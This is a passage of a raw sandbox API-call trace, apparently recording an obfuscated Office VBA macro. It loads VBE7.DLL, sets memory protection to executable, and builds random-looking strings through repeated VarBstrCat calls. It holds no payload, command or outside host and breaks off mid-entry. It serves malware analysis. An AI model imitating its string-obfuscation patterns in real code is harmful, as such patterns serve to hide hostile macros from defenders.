WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7230c358, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0023.258] ITypeInfo:RemoteGetDllEntry (in: This=0x572d60c, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x12506c, pbstrName=0x0, pwOrdinal=0x2 | out: pBstrDllName=0x12506c*=0x0, pbstrName=0x0, pwOrdinal=0x2) returned 0x0 [0023.258] ITypeInfo:RemoteGetDllEntry (in: This=0x572d60c, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x12506c, pwOrdinal=0x46f375c | out: pBstrDllName=0x0, pbstrName=0x12506c*="", pwOrdinal=0x46f375c*=0x5) returned 0x0 [0023.262] CRetailMalloc_Free () returned 0x12a0001 [0023.262] CRetailMalloc_Free () returned 0x1b20201 [0023.262] VirtualProtect (in: lpAddress=0x28774b2, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x125234 | out: lpflOldProtect=0x125234*=0x40) returned 1 [0023.262] VirtualProtect (in: lpAddress=0x28774c6, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x125234 | out: lpflOldProtect=0x125234*=0x40) returned 1 [0023.262] SetErrorMode (uMode=0x8001) returned 0x8001 [0023.262] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0023.262] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x720d0000 [0023.266] SetErrorMode (uMode=0x8001) returned 0x8001 [0023.266] GetProcAddress (hModule=0x720d0000, lpProcName=0x258) returned 0x721a2b76 [0023.266] IUnknown:AddRef (This=0x569eed4) returned 0x4 [0023.266] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125a4c | out: ppvObject=0x125a4c*=0x0) returned 0x80004002 [0023.266] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125a54 | out: ppvObject=0x125a54*=0x0) returned 0x80004002 [0023.266] IUnknown:Release (This=0x569eed4) returned 0x3 [0023.266] IUnknown:AddRef (This=0x569ef2c) returned 0x4 [0023.266] IUnknown:QueryInterface (in: This=0x569ef2c, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125a4c | out: ppvObject=0x125a4c*=0x0) returned 0x80004002 [0023.266] IUnknown:QueryInterface (in: This=0x569ef2c, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125a54 | out: ppvObject=0x125a54*=0x0) returned 0x80004002 [0023.266] IUnknown:Release (This=0x569ef2c) returned 0x3 [0023.267] IUnknown:AddRef (This=0x569efdc) returned 0x5 [0023.267] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125a4c | out: ppvObject=0x125a4c*=0x0) returned 0x80004002 [0023.267] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125a54 | out: ppvObject=0x125a54*=0x0) returned 0x80004002 [0023.267] IUnknown:Release (This=0x569efdc) returned 0x4 [0023.267] IUnknown:AddRef (This=0x572d60c) returned 0x3 [0023.267] IUnknown:QueryInterface (in: This=0x572d60c, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125a4c | out: ppvObject=0x125a4c*=0x0) returned 0x80004002 [0023.267] IUnknown:QueryInterface (in: This=0x572d60c, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125a54 | out: ppvObject=0x125a54*=0x0) returned 0x80004002 [0023.267] IUnknown:Release (This=0x572d60c) returned 0x2 [0023.267] VarBstrCat (in: bstrLeft="WsKaCMuKU", bstrRight="pSbWwraCzK", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.267] VarBstrCat (in: bstrLeft="WsKaCMuKUpSbWwraCzK", bstrRight="vNZECzw", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.267] VarBstrCat (in: bstrLeft="WsKaCMuKUpSbWwraCzKvNZECzw", bstrRight="GRtZHMUNKxb", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.267] VarBstrCat (in: bstrLeft="WsKaCMuKUpSbWwraCzKvNZECzwGRtZHMUNKxb", bstrRight="rDNkdeDH", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.267] VarBstrCat (in: bstrLeft="WsKaCMuKUpSbWwraCzKvNZECzwGRtZHMUNKxbrDNkdeDH", bstrRight="DYnDmzfuZaV", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.267] VarBstrCat (in: bstrLeft="WsKaCMuKUpSbWwraCzKvNZECzwGRtZHMUNKxbrDNkdeDHDYnDmzfuZaV", bstrRight="RxdZuREUTKd", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.267] VarAdd (in: pvarLeft=0x125b14, pvarRight=0x125b24, pvarResult=0x125b04 | out: pvarResult=0x125b04) returned 0x0 [0023.267] VarBstrCat (in: bstrLeft="RxzkKtCmM", bstrRight="sVdsXBppZ", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.267] VarBstrCat (in: bstrLeft="RxzkKtCmMsVdsXBppZ", bstrRight="zFuyFtSWh", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.267] VarBstrCat (in: bstrLeft="RxzkKtCmMsVdsXBppZzFuyFtSWh", bstrRight="LtAYsKBMK", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.267] VarBstrCat (in: bstrLeft="RxzkKtCmMsVdsXBppZzFuyFtSWhLtAYsKBMK", bstrRight="SsSyLtfYmy", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="RxzkKtCmMsVdsXBppZzFuyFtSWhLtAYsKBMKSsSyLtfYmy", bstrRight="rGVxsLF", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="RxzkKtCmMsVdsXBppZzFuyFtSWhLtAYsKBMKSsSyLtfYmyrGVxsLF", bstrRight="EcekhReVpLT", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarAdd (in: pvarLeft=0x125ad0, pvarRight=0x125ae0, pvarResult=0x125ac0 | out: pvarResult=0x125ac0) returned 0x0 [0023.268] VarCmp (pvarLeft=0x125b04, pvarRight=0x125ac0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0023.268] VarBstrCat (in: bstrLeft="FyAWuwyU", bstrRight="RespRFT", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="FyAWuwyURespRFT", bstrRight="czgPUeW", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="FyAWuwyURespRFTczgPUeW", bstrRight="BUghykR", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="FyAWuwyURespRFTczgPUeWBUghykR", bstrRight="fYCWeHyS", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="FyAWuwyURespRFTczgPUeWBUghykRfYCWeHyS", bstrRight="MCDwxvgssMW", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="FyAWuwyURespRFTczgPUeWBUghykRfYCWeHySMCDwxvgssMW", bstrRight="dKuCNTgWbfs", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarAdd (in: pvarLeft=0x125a7c, pvarRight=0x125a8c, pvarResult=0x125a6c | out: pvarResult=0x125a6c) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="XtCUWTDrmMv", bstrRight="MruufYeUR", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="XtCUWTDrmMvMruufYeUR", bstrRight="PymSCENgkWh", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="XtCUWTDrmMvMruufYeURPymSCENgkWh", bstrRight="mNrCGdD", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="XtCUWTDrmMvMruufYeURPymSCENgkWhmNrCGdD", bstrRight="gPDYdbBF", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="XtCUWTDrmMvMruufYeURPymSCENgkWhmNrCGdDgPDYdbBF", bstrRight="kwUmUXGMRXn", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="XtCUWTDrmMvMruufYeURPymSCENgkWhmNrCGdDgPDYdbBFkwUmUXGMRXn", bstrRight="wfGLRRHR", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarAdd (in: pvarLeft=0x125a28, pvarRight=0x125a38, pvarResult=0x125a18 | out: pvarResult=0x125a18) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="mvdTxDArt", bstrRight="nFSUzznK", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="mvdTxDArtnFSUzznK", bstrRight="gkuLNVz", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="mvdTxDArtnFSUzznKgkuLNVz", bstrRight="HxNCCTWX", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="mvdTxDArtnFSUzznKgkuLNVzHxNCCTWX", bstrRight="CHSvbdbdnyc", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="mvdTxDArtnFSUzznKgkuLNVzHxNCCTWXCHSvbdbdnyc", bstrRight="TRDULTsMGwV", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.268] VarBstrCat (in: bstrLeft="mvdTxDArtnFSUzznKgkuLNVzHxNCCTWXCHSvbdbdnycTRDULTsMGwV", bstrRight="BCGCBaK", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.269] VarAdd (in: pvarLeft=0x1259d4, pvarRight=0x1259e4, pvarResult=0x1259c4 | out: pvarResult=0x1259c4) returned 0x0 [0023.269] VarBstrCat (in: bstrLeft="AUSYGPHwv", bstrRight="nBKyVvhfCYP", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.269] VarBstrCat (in: bstrLeft="AUSYGPHwvnBKyVvhfCYP", bstrRight="AkRpekv", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.269] VarBstrCat (in: bstrLeft="AUSYGPHwvnBKyVvhfCYPAkRpekv", bstrRight="AAPRMUNP", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.269] VarBstrCat (in: bstrLeft="AUSYGPHwvnBKyVvhfCYPAkRpekvAAPRMUNP", bstrRight="BUxhmvKchA", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.269] VarBstrCat (in: bstrLeft="AUSYGPHwvnBKyVvhfCYPAkRpekvAAPRMUNPBUxhmvKchA", bstrRight="VMNkMCHS", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.269] VarBstrCat (in: bstrLeft="AUSYGPHwvnBKyVvhfCYPAkRpekvAAPRMUNPBUxhmvKchAVMNkMCHS", bstrRight="CgfMeYPhFzW", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.269] VarBstrCat (in: bstrLeft="AUSYGPHwvnBKyVvhfCYPAkRpekvAAPRMUNPBUxhmvKchAVMNkMCHSCgfMeYPhFzW", bstrRight="wUGCYgCd", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.308] VarBstrCmp (bstrLeft="False", bstrRight="AUSYGPHwvnBKyVvhfCYPAkRpekvAAPRMUNPBUxhmvKchAVMNkMCHSCgfMeYPhFzWwUGCYgCd", lcid=0x0, dwFlags=0x30001) returned 0x2 [0023.309] VarBstrCat (in: bstrLeft="pguKBuA", bstrRight="fczercYgB", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="pguKBuAfczercYgB", bstrRight="mBEzKDtCnWW", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="pguKBuAfczercYgBmBEzKDtCnWW", bstrRight="ZCZXyAt", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="pguKBuAfczercYgBmBEzKDtCnWWZCZXyAt", bstrRight="BUhKfda", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="pguKBuAfczercYgBmBEzKDtCnWWZCZXyAtBUhKfda", bstrRight="CnswDUA", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="pguKBuAfczercYgBmBEzKDtCnWWZCZXyAtBUhKfdaCnswDUA", bstrRight="zUXuKYSfFxX", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.309] VarAdd (in: pvarLeft=0x125b14, pvarRight=0x12595c, pvarResult=0x125b04 | out: pvarResult=0x125b04) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="FxfzBuZhcs", bstrRight="DwTyMsShaDd", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="FxfzBuZhcsDwTyMsShaDd", bstrRight="VeXfLaK", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="FxfzBuZhcsDwTyMsShaDdVeXfLaK", bstrRight="TNZvPrwxXvD", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="FxfzBuZhcsDwTyMsShaDdVeXfLaKTNZvPrwxXvD", bstrRight="VyyRRbg", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="FxfzBuZhcsDwTyMsShaDdVeXfLaKTNZvPrwxXvDVyyRRbg", bstrRight="RftYgZS", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="FxfzBuZhcsDwTyMsShaDdVeXfLaKTNZvPrwxXvDVyyRRbgRftYgZS", bstrRight="BAxWvmcreT", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarAdd (in: pvarLeft=0x125ad0, pvarRight=0x12594c, pvarResult=0x125ac0 | out: pvarResult=0x125ac0) returned 0x0 [0023.309] VarCmp (pvarLeft=0x125b04, pvarRight=0x125ac0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0023.309] VarBstrCat (in: bstrLeft="MkYHprk", bstrRight="ecZfRBdCmmM", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="MkYHprkecZfRBdCmmM", bstrRight="fFFVeEfC", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="MkYHprkecZfRBdCmmMfFFVeEfC", bstrRight="ELWEXuUw", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="MkYHprkecZfRBdCmmMfFFVeEfCELWEXuUw", bstrRight="rtkCUtp", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="MkYHprkecZfRBdCmmMfFFVeEfCELWEXuUwrtkCUtp", bstrRight="MPxbtAz", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="MkYHprkecZfRBdCmmMfFFVeEfCELWEXuUwrtkCUtpMPxbtAz", bstrRight="wTXBvaZusmZ", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="MkYHprkecZfRBdCmmMfFFVeEfCELWEXuUwrtkCUtpMPxbtAzwTXBvaZusmZ", bstrRight="WAGGhmt", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.309] VarBstrCmp (bstrLeft="False", bstrRight="MkYHprkecZfRBdCmmMfFFVeEfCELWEXuUwrtkCUtpMPxbtAzwTXBvaZusmZWAGGhmt", lcid=0x0, dwFlags=0x30001) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="CtRSuxRLK", bstrRight="uZkbYfSR", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.309] VarBstrCat (in: bstrLeft="CtRSuxRLKuZkbYfSR", bstrRight="dNXkYwKpF", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="CtRSuxRLKuZkbYfSRdNXkYwKpF", bstrRight="sVKWfWytZ", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="CtRSuxRLKuZkbYfSRdNXkYwKpFsVKWfWytZ", bstrRight="fMaBeHVu", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="CtRSuxRLKuZkbYfSRdNXkYwKpFsVKWfWytZfMaBeHVu", bstrRight="UTAaUgZtTXA", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="CtRSuxRLKuZkbYfSRdNXkYwKpFsVKWfWytZfMaBeHVuUTAaUgZtTXA", bstrRight="cLeaWVWhsp", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.310] VarAdd (in: pvarLeft=0x125b14, pvarRight=0x12592c, pvarResult=0x125b04 | out: pvarResult=0x125b04) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="fyGPBHu", bstrRight="MxCTZzP", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="fyGPBHuMxCTZzP", bstrRight="NEReWKHDRh", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="fyGPBHuMxCTZzPNEReWKHDRh", bstrRight="wPNnDsYUV", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="fyGPBHuMxCTZzPNEReWKHDRhwPNnDsYUV", bstrRight="hyrmXrE", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="fyGPBHuMxCTZzPNEReWKHDRhwPNnDsYUVhyrmXrE", bstrRight="TwTFWUvnKYk", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="fyGPBHuMxCTZzPNEReWKHDRhwPNnDsYUVhyrmXrETwTFWUvnKYk", bstrRight="rsuLVGRZ", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarAdd (in: pvarLeft=0x125ad0, pvarRight=0x12591c, pvarResult=0x125ac0 | out: pvarResult=0x125ac0) returned 0x0 [0023.310] VarCmp (pvarLeft=0x125b04, pvarRight=0x125ac0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="YzNgyKmzvRx", bstrRight="CsUZzDXw", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="YzNgyKmzvRxCsUZzDXw", bstrRight="ZMKYFckG", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="YzNgyKmzvRxCsUZzDXwZMKYFckG", bstrRight="DXWTRRnCLht", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="YzNgyKmzvRxCsUZzDXwZMKYFckGDXWTRRnCLht", bstrRight="mUHPVdbM", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="YzNgyKmzvRxCsUZzDXwZMKYFckGDXWTRRnCLhtmUHPVdbM", bstrRight="YKVSwncRTRp", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="YzNgyKmzvRxCsUZzDXwZMKYFckGDXWTRRnCLhtmUHPVdbMYKVSwncRTRp", bstrRight="KtGHVZbPV", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarAdd (in: pvarLeft=0x125a7c, pvarRight=0x12590c, pvarResult=0x125a6c | out: pvarResult=0x125a6c) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="VMsxhNG", bstrRight="XfvYKynMy", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="VMsxhNGXfvYKynMy", bstrRight="enUEHYA", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="VMsxhNGXfvYKynMyenUEHYA", bstrRight="mGVRSfbZykn", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="VMsxhNGXfvYKynMyenUEHYAmGVRSfbZykn", bstrRight="frAgyuCFKaB", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="VMsxhNGXfvYKynMyenUEHYAmGVRSfbZyknfrAgyuCFKaB", bstrRight="kkbETbt", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="VMsxhNGXfvYKynMyenUEHYAmGVRSfbZyknfrAgyuCFKaBkkbETbt", bstrRight="hSCDBhRVrda", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.310] VarBstrCat (in: bstrLeft="VMsxhNGXfvYKynMyenUEHYAmGVRSfbZyknfrAgyuCFKaBkkbETbthSCDBhRVrda", bstrRight="TNARYcY", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCmp (bstrLeft="False", bstrRight="VMsxhNGXfvYKynMyenUEHYAmGVRSfbZyknfrAgyuCFKaBkkbETbthSCDBhRVrdaTNARYcY", lcid=0x0, dwFlags=0x30001) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="NVGHZCgRGFN", bstrRight="ybzcFWSPbY", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="NVGHZCgRGFNybzcFWSPbY", bstrRight="LfMkfxGd", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="NVGHZCgRGFNybzcFWSPbYLfMkfxGd", bstrRight="LCCWUdDB", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="NVGHZCgRGFNybzcFWSPbYLfMkfxGdLCCWUdDB", bstrRight="ndLygsgbak", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="NVGHZCgRGFNybzcFWSPbYLfMkfxGdLCCWUdDBndLygsgbak", bstrRight="fmCtWctKhY", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="NVGHZCgRGFNybzcFWSPbYLfMkfxGdLCCWUdDBndLygsgbakfmCtWctKhY", bstrRight="agmLMdYt", pbstrResult=0x125698 | out: pbstrResult=0x125698) returned 0x0 [0023.311] VarAdd (in: pvarLeft=0x125b14, pvarRight=0x1258ec, pvarResult=0x125b04 | out: pvarResult=0x125b04) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="UcrVbdeVFTW", bstrRight="FmrseLA", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="UcrVbdeVFTWFmrseLA", bstrRight="fSRkkBuerGf", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="UcrVbdeVFTWFmrseLAfSRkkBuerGf", bstrRight="vcsYTtLsas", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="UcrVbdeVFTWFmrseLAfSRkkBuerGfvcsYTtLsas", bstrRight="HRPKERehx", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="UcrVbdeVFTWFmrseLAfSRkkBuerGfvcsYTtLsasHRPKERehx", bstrRight="KvhFNymkY", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="UcrVbdeVFTWFmrseLAfSRkkBuerGfvcsYTtLsasHRPKERehxKvhFNymkY", bstrRight="FBMgLpHZW", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarAdd (in: pvarLeft=0x125ad0, pvarRight=0x1258dc, pvarResult=0x125ac0 | out: pvarResult=0x125ac0) returned 0x0 [0023.311] VarCmp (pvarLeft=0x125b04, pvarRight=0x125ac0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="RUMeCZP", bstrRight="rFevcgb", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="RUMeCZPrFevcgb", bstrRight="dBnyFhUPn", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="RUMeCZPrFevcgbdBnyFhUPn", bstrRight="LgSraHWMnsK", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="RUMeCZPrFevcgbdBnyFhUPnLgSraHWMnsK", bstrRight="WSyECXp", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="RUMeCZPrFevcgbdBnyFhUPnLgSraHWMnsKWSyECXp", bstrRight="MHNgRySGNMU", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="RUMeCZPrFevcgbdBnyFhUPnLgSraHWMnsKWSyECXpMHNgRySGNMU", bstrRight="MSRDtwS", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarAdd (in: pvarLeft=0x125a7c, pvarRight=0x1258cc, pvarResult=0x125a6c | out: pvarResult=0x125a6c) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="athdtPpxTk", bstrRight="tdHAPRvkD", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="athdtPpxTktdHAPRvkD", bstrRight="WhetKTvXVY", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="athdtPpxTktdHAPRvkDWhetKTvXVY", bstrRight="RPFsPdv", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="athdtPpxTktdHAPRvkDWhetKTvXVYRPFsPdv", bstrRight="PFbHtBGhH", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: bstrLeft="athdtPpxTktdHAPRvkDWhetKTvXVYRPFsPdvPFbHtBGhH", bstrRight="NMBANNwaDds", pbstrResult=0x125694 | out: pbstrResult=0x125694) returned 0x0 [0023.311] VarBstrCat (in: 